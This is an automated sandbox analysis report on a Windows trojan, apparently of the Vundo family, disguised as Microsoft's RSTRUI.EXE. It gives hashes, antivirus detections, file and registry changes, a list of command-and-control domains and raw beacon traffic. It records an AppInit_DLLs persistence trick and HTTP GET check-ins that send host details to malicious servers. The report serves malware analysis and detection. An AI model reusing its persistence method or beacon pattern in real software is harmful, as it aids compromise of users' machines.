Analysis Date | 2014-11-22 10:24:05 |
---|---|
MD5 | 27693900b327b570d0aa240a2da1fbd9 |
SHA1 | 9f899723711a6fba750a102087c1409d8a2a3c41 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 2d1ba9174b64608447ea98175109840f sha1: b210ba5bf7fe4423441d2572a337dd82c256e5a9 size: 91648 | |
Section | _ASM2 md5: 62c826d4ddef367d075c0cba0669f0a0 sha1: b240b0ac984e37c53bffb3e34f2fc960b9468d77 size: 63488 | |
Section | .rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192 | |
Section | .data md5: 38e766bb1ef49e52025bc1f89e1812ff sha1: edbc9cadc0cfd216f791595068951582ff10913c size: 5120 | |
Section | .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 | |
Section | .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304 | |
Timestamp | 2012-09-25 04:15:44 | |
Version | LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | ed7168502630d6f765608bf68788c6f93aa2bee5 | |
IMPhash | 11c52178b812c23b7febf02fc8e99619 | |
AV | 360 Safe | Gen:Variant.Spy.5 |
AV | Ad-Aware | Gen:Variant.Spy.5 |
AV | Alwil (avast) | Vundo-XF [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen7 |
AV | BullGuard | Gen:Variant.Spy.5 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | WIN.Trojan.Agent-164717 |
AV | Dr. Web | Trojan.Inject1.10169 |
AV | Emsisoft | Gen:Variant.Spy.5 |
AV | Eset (nod32) | Win32/Kryptik.AMFU |
AV | Fortinet | W32/Citirevo.AB!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Spy.5 |
AV | Grisoft (avg) | Generic_r.BGN |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | Backdoor ( 04c4f2bf1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.FakeMS.ED |
AV | Mcafee | Vundo-FASV!27693900B327 |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Spy.5 |
AV | Rising | no_virus |
AV | Sophos | Mal/Vundo-M |
AV | Symantec | Trojan.Gen.2 |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\hyjrqnc.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | denadb.com |
Winsock DNS | 91.220.35.154 |
Winsock DNS | terrans.su |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | denareclick.com |
Winsock DNS | fescheck.com |
Winsock DNS | instrango.com |
Winsock DNS | verzinla.com |
Winsock DNS | getintsu.com |
Winsock DNS | tegimode.com |
Winsock DNS | netrovad.com |
Winsock DNS | nshouse1.com |
Winsock DNS | veriolana.com |
Winsock DNS | inzavora.com |
Winsock DNS | odobvare.com |
Winsock DNS | foradns.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\hyjrqnc.dll\\x00 |
---|
Network Details:
DNS | getintsu.com Type: A 141.8.225.80 |
---|---|
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 209.222.14.3 |
DNS | fescheck.com Type: A 209.222.14.3 |
DNS | instrango.com Type: A 204.11.56.26 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | denadb.com Type: A 204.11.56.26 |
DNS | foradns.com Type: A 141.8.225.62 |
DNS | veriolana.com Type: A |
DNS | verzinla.com\032 Type: A |
DNS | netrovad.com Type: A |
DNS | odobvare.com Type: A |
DNS | terrans.su Type: A |
DNS | tegimode.com Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm User-Agent: |
HTTP GET | http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7KXq7TYIaWNT User-Agent: |
HTTP GET | http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7GWqf3nLQkm3 User-Agent: |
HTTP GET | http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7C2CLOdXR1x7 User-Agent: |
HTTP GET | http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7Bf8bvoXlKnf User-Agent: |
HTTP GET | http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm User-Agent: |
HTTP GET | http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7EZ5+AFDzOit User-Agent: |
HTTP GET | http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7DU5SDo9CRU2 User-Agent: |
HTTP GET | http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7B4l6AvLbvw9 User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1034 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1035 ➝ 204.11.56.26:80 |
Flows TCP | 192.168.1.1:1036 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1037 ➝ 204.11.56.26:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.62:80 |
Flows TCP | 192.168.1.1:1039 ➝ 91.220.35.154:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374d68 48596676 566a6476 6d204854 x7MhHYfvVjdvm HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206765 TP/1.1..Host: ge 0x000000e0 (00224) 74696e74 73752e63 6f6d0d0a 0d0a tintsu.com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374b58 71375459 4961574e 54204854 x7KXq7TYIaWNT HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206765 TP/1.1..Host: ge 0x000000e0 (00224) 7461766f 6465732e 636f6d0d 0a0d0a tavodes.com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374757 7166336e 4c516b6d 33204854 x7GWqf3nLQkm3 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a207472 TP/1.1..Host: tr 0x000000e0 (00224) 79617464 6e732e63 6f6d0d0a 0d0a0a yatdns.com..... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374332 434c4f64 58523178 37204854 x7C2CLOdXR1x7 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206665 TP/1.1..Host: fe 0x000000e0 (00224) 73636865 636b2e63 6f6d0d0a 0d0a0a scheck.com..... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374266 3862766f 586c4b6e 66204854 x7Bf8bvoXlKnf HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20696e TP/1.1..Host: in 0x000000e0 (00224) 73747261 6e676f2e 636f6d0d 0a0d0a strango.com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374d68 48596676 566a6476 6d204854 x7MhHYfvVjdvm HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20696e TP/1.1..Host: in 0x000000e0 (00224) 7a61766f 72612e63 6f6d0d0a 0d0a0a zavora.com..... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 7837455a 352b4146 447a4f69 74204854 x7EZ5+AFDzOit HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a206465 TP/1.1..Host: de 0x000000e0 (00224) 6e616462 2e636f6d 0d0a0d0a 0d0a0a nadb.com....... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374455 3553446f 39435255 32204854 x7DU5SDo9CRU2 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20666f TP/1.1..Host: fo 0x000000e0 (00224) 7261646e 732e636f 6d0d0a0d 0a0a0a radns.com...... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d37 33362661 XX0000&key=736&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 36373926 6f733d35 2e312e32 3630302e 679&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79677732 4a774f47 38324b46 415a6c49 ygw2JwOG82KFAZlI 0x000000b0 (00176) 54354b77 5a4f6263 6c436f74 4763306e T5KwZObclCotGc0n 0x000000c0 (00192) 78374234 6c364176 4c627677 39204854 x7B4l6AvLbvw9 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a203931 TP/1.1..Host: 91 0x000000e0 (00224) 2e323230 2e33352e 3135340d 0a0d0a .220.35.154....
Strings
PM a .. .>uriVttcetorla \ .CC . a.X .uri 041904B0 1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee 1Display debugger and debuggee version information 333f3 5.1.2600.5512 5.1.2600.5512 (xpsp.080413-2108) 7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information 8Configure mapping from file extension to source language About WinDbg Activate window Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows Close all source windows-Close all windows that are error placeholders"Open a new docked window container CompanyName CWindowClass Debug operations Detach the current program Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier Dock all undocked windows f3fff FileDescription FileVersion H ((((( H Halt the current program Help contents and searches h(((( H InternalName KERNEL32.DLL Kernel debugging control.Cycle through the available baud rate settings LegalCopyright Manage event filters Manage open windows :Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available Microsoft mscoree.dll Open a command browser window Open the command window Open the disassembly window Open the help index Open the help search dialog Open the help table of contents)Open the help for the current window type)Open help for the currently selected text "Open the process and thread window Open the registers window Open the scratch pad window"Open the process and thread window OriginalFilename ProductName ProductVersion Restart the Program"Stop debugging the current program RSTRUI.EXE Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running Step over the next statement Step out of the current function1Run the program to the line containing the cursor StringFileInfo Toggle the status bar on or off Toggle the status bar on or off,View or edit the font for the current window Toggle the toolbar on or off Trace into the next statement Translation Undock all docked windows VarFileInfo View program options View the module list View WinDbg's command line VS_VERSION_INFO Window arrangement and selection Windows !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 0A@@Ju 0E~oski 0SSSSS _0=?YYe 1cucf' 1LZ]5nN8U`a 1mNlOc 28BHT}BHRX 4cz`M 5 4juPo*22? 4twgS` )59Ea<Yeiu 5xsylhhlSt .6#K4M :-6lBp? 6lW@9] )7U yu 7}~w/O 8;7780 >8-DSU ,8qCN/|5 ".9p6n 9T#rr-@/ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ADVAPI32.dll ADVAPI32.DLL AdviseInUserModeA .agN_C; ;AKQMtkq{Gq A<MN~j An application has made an attempt to load the C runtime library incorrectly. `_ASM2 - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August az :Wm?4 &b6Gqa BeginPaint bhrxT] bhrxT]RX =B@@qO BtrV@cd BX-,)E C@3Du5 C62rH CIL\Z" CloseHandle CorExitProcess CoTaskMemAlloc CreateBitmap CreateSolidBrush CreateWindowExA }cRnRr&"A3Sp - CRT not initialized ctner? Cw Crro1 @CwN+;%? c|'_xh @.data DateTime:%04d.%02d:%d dcdli= DDDDDC DDDDDDDDDD dddd, MMMM dd, yyyy dE|6I? December DecodePointer DeleteCriticalSection DestroyWindow DeviceIoControl DispatchMessageA DltHr) DOMAIN error DrawTextA DrleN\ eA&7eu [eaTNe eCee39 eg,Is; _eipiF ,elSlX EncodePointer EndPaint EnterCriticalSection :ENU~5 erhN2sWct erxDr& .ltF >eteH! eu&0 dni eufp n/eR) euv@ vmt`mn gsF _`EUY+ ExitProcess .!e]Y| EY;HI1 February FindResourceA - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue @FPY3vF9YP' FqF1~ FreeEnvironmentStringsA FreeEnvironmentStringsW Friday fuvpWuY < g5aO gb pn7 GDI32.dll GetACP GetActiveWindow GetClientRect GetCommandLineA GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDeviceCaps GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetMessageA GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessWindowStation GetStartupInfoA GetStdHandle GetStringTypeA GetStringTypeW GetSystemMetrics GetSystemTimeAsFileTime GetTickCount GetUserObjectInformationA GetVersion G;gYd' G!?<HW gJvvP) gmC#kQ {gp\t( gSORl6 H2R.Lr HcZ'Hjnn HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize ^HfF*@L HH:mm:ss "HNDe#w Hp7I 1h )hPMu` h/V}[c Hy`<A_z>C hyNvS( ibBZJr \iieSA InitializeCriticalSectionAndSpinCount InterlockedDecrement InterlockedIncrement IsDebuggerPresent IsValidCodePage `IymiL JanFebMarAprMayJunJulAugSepOctNovDec January JavaStudioClass J-F"&~ j/G3e8g jI6Dto j{i|FN#H 'j^iM j@j ^V =J\L^f jogwp6 K|{]@ .KAE!<nCVi KERNEL32.dll kfTr\, !+kg H kpJyM8'iT kSp9&0D >lBXS'9 lClfZt LCMapStringA LCMapStringW LeaveCriticalSection lEesOqr lelV}VtrntG liVee|tl ':Ljm l\ LQc lLu.%I LoadAcceleratorsA LoadCursorA LoadIconA LoadIconW LoadLibraryA LoadResource LoadStringA LockResource lP%Hsv lstrcmpiA lUG*BK lWorr0dFl ,M4,=: "~MbI NuM +M,C{E MessageBoxA m Excemh5 Microsoft Visual C++ Runtime Library MM/dd/yy Monday @M@]QD MultiByteToWideChar ndudYTuaaF.2uMuH |neei) n iiL7 - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November N<@tjo o2PsSvoduPi*tmWeI9Er (O|&7; October )o`~f@+ ole32.dll ortbcfu |OslZ` o sooIee ?uS-id p+F]HK PG!|et phJFsprm Please contact the application's support team for more information. P'mBEt PPPPPPPP P`/Rk T Program: <program name unknown> %ptuiWYeo - pure virtual function call <q,)8g q@dh0: Qo%emcW<L !*QuAJQZ QueryPerformanceCounter r`4Nt/ +R8jGh^ `.rdata Rectangle RegConnectRegistryA RegisterClassExA rGnrI0 RKEeupe r\m3v@05 Rod\en RrdTcy RtlUnwind runtime error Runtime Error! rxVYeI s;!69~0 Saturday scm32.dll September SetFilePointer SetHandleCount SetLastError SetParent SetUnhandledExceptionFilter /sh=, ShowWindow SING error +Sio4F SjtUG9 ~Soh@t s`pe cO*i ssme%j strcat Sunday SunMonTueWedThuFriSat @@Su w sV!8o_ SyDOW), S:YW>% t0@MBG^B T]28bh tCGTlM TerminateProcess )_TEW_ TextOutA tH]eF|eo This application has requested the Runtime to terminate it in an unusual way. This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday @*,T!i < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue t<,QQL TranslateAcceleratorA TranslateMessage t"SS9] t,.[TE t$<"u 3 